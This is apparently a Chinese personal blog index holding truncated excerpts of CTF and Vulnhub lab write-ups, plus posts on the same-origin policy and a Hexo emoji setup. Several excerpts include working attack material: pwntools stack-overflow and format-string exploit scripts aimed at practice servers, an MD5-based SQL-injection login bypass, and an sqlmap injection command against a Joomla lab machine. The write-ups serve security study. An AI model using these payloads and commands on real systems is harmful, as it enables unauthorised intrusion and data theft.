π1L4r

导语点击这里去答题 pretty good privacy看到题目，立刻想到要用pgp。我没有，因此去https://www.gnupg.org/download/index.html 下载一个Gpg4win。安装的时候默认安装的模块都安装了就完事了。 解压题目，可以看到一个这打开doc文件，可以看到这样的内容当然你得先开了word的显示隐藏内容的选项才能看到下面那个TrueCrypt的内容。然后全选，设置字体颜色为黑色，可以看到这个藏比还多藏了一点，但不多。（？） 看到TrueCrypt，立即推要用TrueCrypt。我没有，因此去https://sourceforge.net/projects/truecrypt/files/TrueCrypt/TrueCrypt-7.2.exe/download 下一个并且安装。 然后我们就看一下.pgp，由于目前我们没有获得密钥，所以是无法解密的。 看到有TrueCrypt，试着用TrueCrypt挂载CISCN2016如果你在第一层，用的是第一行的密码，那么你可以看到那你能帮帮我吗（？） 然而我们老misc选手word可能没有显示隐藏内容 ...

导语确实baby stack babystack先checksec 拖进IDA 先输入一个数字，作为nbytes，然后在read nbytes个进buf，没有进行长度检查，硬read。 还可以看到一个backdoor函数 于是栈溢出 虽然上面IDA显示的是buf[12]，但是我们看一眼栈就知道需要用4个db=16字节填满buf，然后一个p64填充ebp，再填backdoor的地址 from pwn import *sla=lambda x,y:sh.sendlineafter(x,y)sh=remote("node4.buuoj.cn",27836)payload='A'*16+p64(0)+p64(0x4006e6)sla('name:','100')sla('name?',payload)sh.interactive()

导语由于浏览器最核心、最基本的安全功能——同源策略，的限制，不同源的客户端脚本在没有明确授权的情况下，不能读写对方资源。跨域的问题可以说是前端程序员的一坨心病，与此同时跨域安全也是安全程序员的一大坨心病，今天由我来简单说说~ 同源策略是什么同源策略是浏览器最核心、最基本的安全功能，是对不同域资源的管理策略。简单来说就是在没有明确授权的情况下，一个源的脚本能且仅能访问自己的源的资源。这里的“资源”主要包括： 非同源网页的 Cookie、LocalStorage 和 IndexedDB 非同源网页的 DOM 非同源地址发送 AJAX 请求浏览器会拒绝响应 而要想搞明白同源策略，首先要知道怎么样算“同源”：如果两个页面的协议 协议、 域名 和 端口 都相同的话，那么他们就是同源的。举个栗子，针对 http://smartpillar.xyz 这个页面 URL 是否同源 Why？ http://smartpillar.xyz/跨域及安全 是 协议：http 域名：www.smartpillar.xyz 端口：默认（80） https://smartpillar.xyz/ ...

导语something about md5 Easy-Md5 开局一个白框，啥回显也没有。拿burpsuit看看 响应头里有提示，经过一番学习，ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c，这个字符串前几位刚好是 ‘ or ‘6，而 Mysql 刚好又会吧 hex 转成 ascii 解释 在mysql中，以数字开头的字符串在转义为boolean时会被看成数字再转义，非零的数字也会被转义是true、 所以ffifdyop相当于是一个万能pass 根据提示，要让a和b不等，但是让a和b的MD5相等。想到php中数组的md5值都为NULL。 或者用php的0e绕过，php会把xe……（x为数）开头的一串当做科学计数法，0e表示0*10^……次方，不论……是几，都会被看成0。下面是一些md5后会变成0e的 QNKCDZO0e830400451993494058024219903391 s878926199a0e545993274517709034328855841020 s155964671a0e3427684 ...

导语想要成为web手 easy-tornado看到题目，想到tornado框架 Tornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架（包括大多数 Python 的框架）有着明显的区别：它是非阻塞式服务器，而且速度相当快。 打开题目，先看hint /hints.txtmd5(cookie_secret+md5(filename)) 看到url是 http://f2687ed3-88cb-46a0-bb7b-83316462a9d0.node4.buuoj.cn:81/file?filename=/hints.txt&filehash=d3d3cea510582922490a4ede4684b9f6 得知请求的时候应该需要带上filehash这个数据，并且filehash是对（cookie_secret+md5(filename)）进行md5得到的，因此我们需要得知cookie_secret的内容，没有提示cookie_secret的信息，因此无法通过暴破手段来获取cookie_secret，思路走到了死胡同，看看别的 打开flag ...

导语最近换了butterfly主题，想起之前我的博客都没有什么评论留言系统，于是加了valine评论，一不做二不休，顺便把emoji也加了！ 操作主要参考了butterfly主题配置文档主要需要的就是找一个或者建一个emojiCDN出来，这里我白嫖了https://github.com/volantis-x/cdn-emoji因此其实只需要在butterfly的config页面的的emojiCDN添加以下即可，这里我用的贴吧的表情，如果要用其他的也类似。 valine: emojiCDN: 'https://cdn.jsdelivr.net/gh/volantis-x/cdn-emoji/tieba/' 然后再去source/_data/valine.json（不论是文件夹还是文件，如果没有就创一个，这是butterfly默认的寻找emojimap的地方）配置好emojimap。我用的贴吧的，可以变成 {"haha": "haha.png",&quo ...

导语pillar的刷题日记 千层套路开局一个压缩包，010看看，只能说毫无收获 想到可能又是zip知识点全集，先暴破，发现密码是0573，和压缩包名字相同 接着试一试，发现里面的也是类似的 于是写个脚本 import zipfilepsw='0573'file = zipfile.ZipFile('./0573.zip',)ziplist = file.namelist()for f in ziplist: file.extract(f,r'./', pwd=psw.encode("utf-8")) psw=f.replace('.zip','')file.close()while True: file = zipfile.ZipFile('./'+ psw + '.zip',) ziplist = file.namelist() for f in ziplist: file.extract(f,r'./' ...

导语pillar的pwn刷题日记 [第五空间2019 决赛]PWN5 1检查一下 32位，开启canary和nx 利用strings可以找到/bin/sh ida打开，看到system函数和printf 并且看到这里直接printf了我们输入的name 所以直接格式化字符串，将unk_804C044的值改了，然后输入相同的内容就可。 利用%08x找到格式化字符串和我们之间的距离为10 格式化字符串漏洞即 格式化的%n会往当前所指的地址的内容的地址写入已经打印出来的字符的长度。再利用X$（X为任意数值）来作为距离格式化字符串所在地址的偏移量，即可实现任意位置写。 然后我们在AAAA的地方写上0x804c044，在加上%10$n就可以将AAAA所在位置的内容地址写为len(0x804c044)+len(%10$n)=4 from pwn import *context.os='linux'context.arch='i386'context.log_level='debug'sla=lambda x,y:io.sendl ...

导语https://www.vulnhub.com/entry/dc-32,312/ 一个flag，冲！ 步骤靶机和kali都NAT在vmware了 虽然但是，ova里设置有一内内问题，根据提示修改一下设置 然后在就可以愉快的开干了 arp-scan 靶机为192.168.77.142 nmap看看 可以看到是80的http，并且是一个开源的框架Joomla，打开看看 用joomscan扫一下 可以看到是3.7.0版本，后台是adminstrator，没有内核漏洞 直接进行一个searchsploit 查看sploit cat /usr/share/exploitdb/exploits/php/webapps/42033.txt 上sqlmap sqlmap -u "http://192.168.77.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random- ...

导语https://www.vulnhub.com/entry/dc-2,311/ 五个flag，冲！！ 步骤靶机和kali都NAT在vmware了 在kali直接进行一个arpscan 192.168.77.141即是靶机 用nmap收集信息 可以看见开启了80端口运行http服务，开启了7744端口运行ssh服务，且http服务有提示不要去重定向到dc-2。尝试访问一哈，发现并不能成功，这是因为重定向到dc-2的时候dns无法解析，因此设置hosts，让dc-2解析向192.168.77.141 即可成功访问 提示是一个WordPress网站。 且直接给了你flag1 意思是常见密码可能不对，要用cewl Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外，Cewl还提供了命令行工具。 听劝，使用cewl来生成密码字典 cewl http://dc-2 -w passwd.txt 然后用wpsc ...